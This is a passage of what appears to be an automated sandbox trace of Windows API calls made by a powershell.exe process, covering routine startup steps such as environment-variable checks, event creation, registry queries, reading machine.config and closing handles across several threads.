	[0793.731] CoTaskMemFree (pv=0x1b93bcf0) 
	[0793.734] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0793.734] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.734] CoTaskMemFree (pv=0x1b93bcf0) 
	[0793.737] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0793.737] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.737] CoTaskMemFree (pv=0x1b93bcf0) 
	[0793.738] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x324
	[0793.738] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x30c
	[0793.738] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a4
	[0793.738] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0793.738] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x330
	[0793.738] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0793.738] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0793.739] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0793.739] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x340
	[0793.739] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x344
	[0793.739] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0793.739] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a8
	[0793.741] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0793.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.742] CoTaskMemFree (pv=0x1b93bcf0) 
	[0793.744] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0793.744] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x18db40 | out: lpMode=0x18db40) returned 1
	[0793.745] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0793.745] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.745] CoTaskMemFree (pv=0x1b93bcf0) 
	[0793.748] SetEvent (hEvent=0x32c) returned 1
	[0793.748] SetEvent (hEvent=0x324) returned 1
	[0793.748] SetEvent (hEvent=0x30c) returned 1
	[0793.748] SetEvent (hEvent=0x3a4) returned 1
	[0793.750] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0793.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.750] CoTaskMemFree (pv=0x1b93bcf0) 
	[0793.750] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d898 | out: phkResult=0x18d898*=0x35c) returned 0x0
	[0793.750] RegQueryValueExW (in: hKey=0x35c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x18d81c, lpData=0x0, lpcbData=0x18d818*=0x0 | out: lpType=0x18d81c*=0x0, lpData=0x0, lpcbData=0x18d818*=0x0) returned 0x2

Thread:
	id = 326
	os_tid = 0xfcc


Thread:
	id = 332
	os_tid = 0xff8


Thread:
	id = 1090
	os_tid = 0x1630


Thread:
	id = 1099
	os_tid = 0x16ec


Thread:
	id = 1104
	os_tid = 0x16f8


Thread:
	id = 1134
	os_tid = 0xc50


Thread:
	id = 1137
	os_tid = 0x1040

	[0570.426] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0641.043] RegCloseKey (hKey=0x30c) returned 0x0
	[0641.043] RegCloseKey (hKey=0x314) returned 0x0
	[0641.043] RegCloseKey (hKey=0x310) returned 0x0
	[0699.262] LocalFree (hMem=0x207340) returned 0x0
	[0699.262] LocalFree (hMem=0x207310) returned 0x0
	[0699.262] CloseHandle (hObject=0x314) returned 1
	[0699.262] CloseHandle (hObject=0x13) returned 1
	[0699.336] CloseHandle (hObject=0xf) returned 1
	[0728.452] RegCloseKey (hKey=0x30c) returned 0x0
	[0742.554] RegCloseKey (hKey=0x30c) returned 0x0
	[0782.514] RegCloseKey (hKey=0x378) returned 0x0
	[0782.515] RegCloseKey (hKey=0x3b4) returned 0x0
	[0782.515] RegCloseKey (hKey=0x394) returned 0x0
	[0782.515] RegCloseKey (hKey=0x390) returned 0x0
	[0782.516] RegCloseKey (hKey=0x38c) returned 0x0
	[0782.516] RegCloseKey (hKey=0x388) returned 0x0
	[0782.516] RegCloseKey (hKey=0x384) returned 0x0
	[0782.516] RegCloseKey (hKey=0x380) returned 0x0
	[0782.517] RegCloseKey (hKey=0x37c) returned 0x0
	[0782.517] RegCloseKey (hKey=0x354) returned 0x0
	[0782.517] RegCloseKey (hKey=0x3b0) returned 0x0
	[0782.517] RegCloseKey (hKey=0x3ac) returned 0x0
	[0782.518] RegCloseKey (hKey=0x374) returned 0x0
	[0782.518] RegCloseKey (hKey=0x370) returned 0x0
	[0782.518] RegCloseKey (hKey=0x36c) returned 0x0
	[0782.518] RegCloseKey (hKey=0x368) returned 0x0
	[0782.519] RegCloseKey (hKey=0x364) returned 0x0
	[0782.519] RegCloseKey (hKey=0x360) returned 0x0
	[0782.519] RegCloseKey (hKey=0x35c) returned 0x0
	[0782.519] RegCloseKey (hKey=0x358) returned 0x0
	[0782.520] RegCloseKey (hKey=0x3a8) returned 0x0
	[0782.520] RegCloseKey (hKey=0x348) returned 0x0
	[0782.520] RegCloseKey (hKey=0x344) returned 0x0
	[0782.521] RegCloseKey (hKey=0x340) returned 0x0
	[0782.521] RegCloseKey (hKey=0x33c) returned 0x0
	[0782.521] RegCloseKey (hKey=0x338) returned 0x0
	[0782.521] RegCloseKey (hKey=0x334) returned 0x0
	[0782.522] RegCloseKey (hKey=0x330) returned 0x0
	[0782.522] RegCloseKey (hKey=0x32c) returned 0x0
	[0782.522] RegCloseKey (hKey=0x3a4) returned 0x0
	[0782.522] RegCloseKey (hKey=0x324) returned 0x0
	[0782.522] RegCloseKey (hKey=0x30c) returned 0x0
	[0782.523] RegCloseKey (hKey=0x3a0) returned 0x0
	[0782.523] RegCloseKey (hKey=0x39c) returned 0x0
	[0890.116] CloseHandle (hObject=0x380) returned 1
	[0890.116] CloseHandle (hObject=0x3ac) returned 1
	[0890.116] CloseHandle (hObject=0x3b0) returned 1
	[0890.117] CloseHandle (hObject=0x37c) returned 1
	[0890.117] CloseHandle (hObject=0x374) returned 1
	[0890.117] RegCloseKey (hKey=0x35c) returned 0x0
	[0890.118] CloseHandle (hObject=0x354) returned 1
	[0927.249] CertFreeCRLContext (pCrlContext=0x1cd206a0) returned 1
	[0927.249] CertFreeCRLContext (pCrlContext=0x1b9695f0) returned 1
	[0927.250] CloseHandle (hObject=0x4b8) returned 1
	[0927.250] CloseHandle (hObject=0x384) returned 1
	[0927.250] CertCloseStore (hCertStore=0x1b95af70, dwFlags=0x0) returned 1
	[0927.251] CertFreeCRLContext (pCrlContext=0x1b9695f0) returned 1
	[0927.251] CloseHandle (hObject=0x4a8) returned 1
	[0927.252] CloseHandle (hObject=0x4a4) returned 1
	[0927.252] CloseHandle (hObject=0x44c) returned 1
	[0927.253] CertFreeCRLContext (pCrlContext=0x1b969670) returned 1
	[0927.253] CloseHandle (hObject=0x448) returned 1
	[0927.253] CloseHandle (hObject=0x3f0) returned 1
	[0927.254] CloseHandle (hObject=0x3ec) returned 1
	[0927.254] CertFreeCRLContext (pCrlContext=0x1cd20720) returned 1
	[0927.254] CloseHandle (hObject=0x388) returned 1
	[0927.255] CloseHandle (hObject=0x380) returned 1
	[0927.255] CloseHandle (hObject=0x3ac) returned 1
	[0927.256] CloseHandle (hObject=0x3b0) returned 1
	[0927.256] CloseHandle (hObject=0x37c) returned 1
	[0927.256] CloseHandle (hObject=0x354) returned 1

Thread:
	id = 1190
	os_tid = 0x1038


Thread:
	id = 1681
	os_tid = 0x235c

	[0794.905] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0794.910] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0794.915] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0794.915] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.915] CoTaskMemFree (pv=0x1b93bcf0) 
	[0794.916] VirtualQuery (in: lpAddress=0x1c89dba0, lpBuffer=0x1c89ea60, dwLength=0x30 | out: lpBuffer=0x1c89ea60*(BaseAddress=0x1c89d000, AllocationBase=0x1bf10000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0794.922] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0794.922] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.922] CoTaskMemFree (pv=0x1b93bcf0) 
	[0794.925] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0794.925] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.925] CoTaskMemFree (pv=0x1b93bcf0) 
	[0794.928] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0794.928] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.928] CoTaskMemFree (pv=0x1b93bcf0) 
	[0795.994] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0795.994] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0795.994] CoTaskMemFree (pv=0x1b93bcf0) 
	[0795.999] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0795.999] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0795.999] CoTaskMemFree (pv=0x1b93bcf0) 
	[0796.001] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0796.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0796.001] CoTaskMemFree (pv=0x1b93bcf0) 
	[0796.006] VirtualQuery (in: lpAddress=0x1c89de50, lpBuffer=0x1c89ed10, dwLength=0x30 | out: lpBuffer=0x1c89ed10*(BaseAddress=0x1c89d000, AllocationBase=0x1bf10000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0796.006] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0796.007] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0796.007] CoTaskMemFree (pv=0x1b93bcf0) 
	[0796.009] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0796.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0796.010] CoTaskMemFree (pv=0x1b93bcf0) 
	[0796.010] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0796.010] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0796.010] CoTaskMemFree (pv=0x1b93bcf0) 
	[0796.011] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0796.011] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0796.011] CoTaskMemFree (pv=0x1b93bcf0) 
	[0796.015] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0796.016] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0796.016] CoTaskMemFree (pv=0x1b93bcf0) 
	[0797.115] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0797.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0797.116] CoTaskMemFree (pv=0x1b93bcf0) 
	[0798.181] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0798.181] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.182] CoTaskMemFree (pv=0x1b93bcf0) 
	[0798.183] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0798.183] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.183] CoTaskMemFree (pv=0x1b93bcf0) 
	[0798.186] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0798.186] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.186] CoTaskMemFree (pv=0x1b93bcf0) 
	[0798.187] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0798.187] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.187] CoTaskMemFree (pv=0x1b93bcf0) 
	[0798.189] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0798.189] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.189] CoTaskMemFree (pv=0x1b93bcf0) 
	[0798.191] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0798.191] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.191] CoTaskMemFree (pv=0x1b93bcf0) 
	[0798.210] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0798.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.210] CoTaskMemFree (pv=0x1b93bcf0) 
	[0800.196] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0800.196] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.196] CoTaskMemFree (pv=0x1b93bcf0) 
	[0802.146] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0802.146] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.146] CoTaskMemFree (pv=0x1b93bcf0) 
	[0802.150] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0802.150] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.150] CoTaskMemFree (pv=0x1b93bcf0) 
	[0802.156] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0802.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.156] CoTaskMemFree (pv=0x1b93bcf0) 
	[0853.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c89d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0853.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c89d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0854.675] CoTaskMemAlloc (cb=0x20c) returned 0x1b934180
	[0854.675] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b934180, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0854.675] CoTaskMemFree (pv=0x1b934180) 
	[0854.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c89d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0854.687] GetCurrentProcess () returned 0xffffffffffffffff
	[0854.687] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89d7e8 | out: TokenHandle=0x1c89d7e8*=0x374) returned 1
	[0854.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c89d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0854.693] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c89d890 | out: lpFileInformation=0x1c89d890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0871.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c89d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0871.381] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c89d840 | out: lpFileInformation=0x1c89d840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0880.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c89d220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0880.135] SetErrorMode (uMode=0x1) returned 0x1
	[0880.135] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3b0
	[0880.135] GetFileType (hFile=0x3b0) returned 0x1
	[0880.135] SetErrorMode (uMode=0x1) returned 0x1
	[0880.135] GetFileType (hFile=0x3b0) returned 0x1
	[0880.138] GetFileSize (in: hFile=0x3b0, lpFileSizeHigh=0x1c89d838 | out: lpFileSizeHigh=0x1c89d838*=0x0) returned 0x622a
	[0881.201] ReadFile (in: hFile=0x3b0, lpBuffer=0x30466b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c89d758, lpOverlapped=0x0 | out: lpBuffer=0x30466b8*, lpNumberOfBytesRead=0x1c89d758*=0x1000, lpOverlapped=0x0) returned 1
	[0882.773] ReadFile (in: hFile=0x3b0, lpBuffer=0x30466b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c89d288, lpOverlapped=0x0 | out: lpBuffer=0x30466b8*, lpNumberOfBytesRead=0x1c89d288*=0x1000, lpOverlapped=0x0) returned 1
	[0884.097] ReadFile (in: hFile=0x3b0, lpBuffer=0x30466b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c89d288, lpOverlapped=0x0 | out: lpBuffer=0x30466b8*, lpNumberOfBytesRead=0x1c89d288*=0x1000, lpOverlapped=0x0) returned 1
	[0884.634] ReadFile (in: hFile=0x3b0, lpBuffer=0x30466b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c89d288, lpOverlapped=0x0 | out: lpBuffer=0x30466b8*, lpNumberOfBytesRead=0x1c89d288*=0x1000, lpOverlapped=0x0) returned 1
	[0884.634] ReadFile (in: hFile=0x3b0, lpBuffer=0x30466b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c89d288, lpOverlapped=0x0 | out: lpBuffer=0x30466b8*, lpNumberOfBytesRead=0x1c89d288*=0x1000, lpOverlapped=0x0) returned 1
	[0884.643] ReadFile (in: hFile=0x3b0, lpBuffer=0x30466b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c89d3c8, lpOverlapped=0x0 | out: lpBuffer=0x30466b8*, lpNumberOfBytesRead=0x1c89d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0884.644] ReadFile (in: hFile=0x3b0, lpBuffer=0x30466b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c89d248, lpOverlapped=0x0 | out: lpBuffer=0x30466b8*, lpNumberOfBytesRead=0x1c89d248*=0x22a, lpOverlapped=0x0) returned 1
	[0884.644] ReadFile (in: hFile=0x3b0, lpBuffer=0x30466b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c89d2e8, lpOverlapped=0x0 | out: lpBuffer=0x30466b8*, lpNumberOfBytesRead=0x1c89d2e8*=0x0, lpOverlapped=0x0) returned 1
	[0884.644] CloseHandle (hObject=0x3b0) returned 1
	[0887.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c89d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0887.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c89d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0887.332] CoTaskMemAlloc (cb=0x20c) returned 0x1b934180
	[0887.332] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b934180, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0887.332] CoTaskMemFree (pv=0x1b934180) 
	[0887.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c89d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0887.333] GetCurrentProcess () returned 0xffffffffffffffff
	[0887.333] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89da48 | out: TokenHandle=0x1c89da48*=0x3b0) returned 1
	[0887.334] GetCurrentProcess () returned 0xffffffffffffffff
	[0887.334] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89da48 | out: TokenHandle=0x1c89da48*=0x3ac) returned 1
	[0887.336] GetCurrentProcess () returned 0xffffffffffffffff
	[0887.336] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89d7e8 | out: TokenHandle=0x1c89d7e8*=0x354) returned 1
	[0887.337] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c89d890 | out: lpFileInformation=0x1c89d890*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0887.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c89d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0887.338] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c89d840 | out: lpFileInformation=0x1c89d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0887.339] GetCurrentProcess () returned 0xffffffffffffffff
	[0887.339] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89da48 | out: TokenHandle=0x1c89da48*=0x37c) returned 1
	[0887.340] GetCurrentProcess () returned 0xffffffffffffffff
	[0887.340] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89da48 | out: TokenHandle=0x1c89da48*=0x380) returned 1
	[0887.358] GetCurrentProcess () returned 0xffffffffffffffff
	[0887.358] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89d6c8 | out: TokenHandle=0x1c89d6c8*=0x384) returned 1
	[0890.141] GetCurrentProcess () returned 0xffffffffffffffff
	[0890.141] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89d6c8 | out: TokenHandle=0x1c89d6c8*=0x354) returned 1
	[0890.730] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x35c
	[0890.730] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x374
	[0890.745] GetCurrentProcess () returned 0xffffffffffffffff
	[0890.745] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89d698 | out: TokenHandle=0x1c89d698*=0x37c) returned 1
	[0890.752] GetCurrentProcess () returned 0xffffffffffffffff
	[0890.752] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89d698 | out: TokenHandle=0x1c89d698*=0x3b0) returned 1
	[0891.167] GetCurrentProcess () returned 0xffffffffffffffff
